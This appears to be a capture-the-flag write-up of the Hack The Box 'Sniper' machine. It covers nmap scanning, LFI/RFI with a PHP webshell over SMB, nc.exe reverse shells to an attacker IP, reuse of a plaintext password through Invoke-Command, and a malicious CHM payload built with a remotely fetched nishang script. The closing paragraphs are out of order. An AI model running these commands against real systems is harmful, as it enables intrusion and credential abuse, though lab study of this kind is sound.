Sniper
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.151 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135,139,445,49667 10.10.10.151 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
The Sniper Co. website has a few links, but only the services link and user portal work.
The services link will go to the /blog/index.php page.
We can choose the language of the site, then the PHP file of that language will be loaded with the lang GET parameter.
As we know this is a windows machine, we could try to exploit a local file inclusion in the lang parameter by putting the Windows absolute path of the /etc/hosts file.
http://10.10.10.151/blog/?lang=\Windows\System32\Drivers\etc\hosts
Now that we know that it is vulnerable to LFI, we could try to exploit RFI (Remote File Inclusion). As it is a Windows machine, and the website runs PHP, let's create a PHP webshell and share it with an SMB server.
echo '<?php system($_GET["cmd"]);?>' > pwn.php
impacket-smbserver smbFolder $(pwd) -smb2support
Now, if we try to retrieve the pwn.php from our SMB server will see that it is not really working.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
This happens sometime because of authentication issues with the SMB server. We could try to share the file with net usershare.
service smbd start
net usershare add smbFolder $(pwd) '' 'Everyone:F' 'guest_ok=y'
Now, it should work, and we should be able to run commands as nt authority\iusr.
http://10.10.10.151/blog/?lang=\\10.10.14.11\smbFolder\pwn.php&cmd=whoami
cp /opt/SecLists/Web-Shells/FuzzDB/nc.exe .
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, send a reverse shell to the netcat listener using the nc.exe binary shared with our SMB server.
view-source:10.10.10.151/blog/?lang=\10.10.14.11\smbFolder\pwn.php&cmd=\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444
If we go back one directory and go to C:\inetpub\wwwroot\user, we'll see a file called db.php with some database credentials.
type \inetpub\wwwroot\user\db.php
As seen below, there is one user called Chris.
net user
We could try to see if he is reusing the same password as the database user. Let's get a PowerShell shell, a try to run commands as Chris creating PSCredentials and using Invoke-Command.
powershell
hostname
$user = "Sniper\chris"
$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { whoami }
As we can run commands as chris, let's get a reverse shell as him. First, set another netcat listener on port 5555.
rlwrap nc -lvnp 5555
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Then send the reverse shell using Invoke-Command. Then, we'll be able to grab the user flag.
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock { \10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }
Taking a look at the directories, we'll see that there is a directory called Docs with a file called note.txt.
dir \docs
The note says something about putting some file in that directory.
type \docs\note.txt
In fact, if we take a look in the downloads folder of chris, we'll see a .chm file. Which means that maybe the Sniper CEO is waiting for a CHM in the Docs directory.
dir \users\chris\downloads
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1')
Then, compile the CHM file with a payload that will send us a reverse shell to port 6666 using the nc.exe binary located in C:\Docs.
Out-CHM -Payload "C:\Docs\nc.exe -e cmd 10.10.14.11 6666" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
This will create the doc.chm file. Transfer it to our Linux machine, and then place it into the Docs directory together with the nc.exe binary.
copy \10.10.14.11\smbFolder\nc.exe
copy \10.10.14.11\smbFolder\doc.chm
dir
Finally, set a netcat listerner on port 6666, and wait to get the reverse shell as the administrator. Then all we have to do is reap the harvest and take the root flag.
rlwrap nc -lvnp 6666
Time to get a shell. First, copy the nc.exe binary from into our current directory.
We could try to create a malicious file and drop it in the docs directory, so when someone opens it, it will send us a reverse shell as that user. To compile this type of files, we'll need to install Microsoft HTML Help Workshop on a Windows machine. Download the installer from .
We can compile a malicious CHM file with a custom payload with the Out-CHM.ps1 script from . On our Windows machine, import the script with PowerShell. Make sure to turn off Windows Defender.
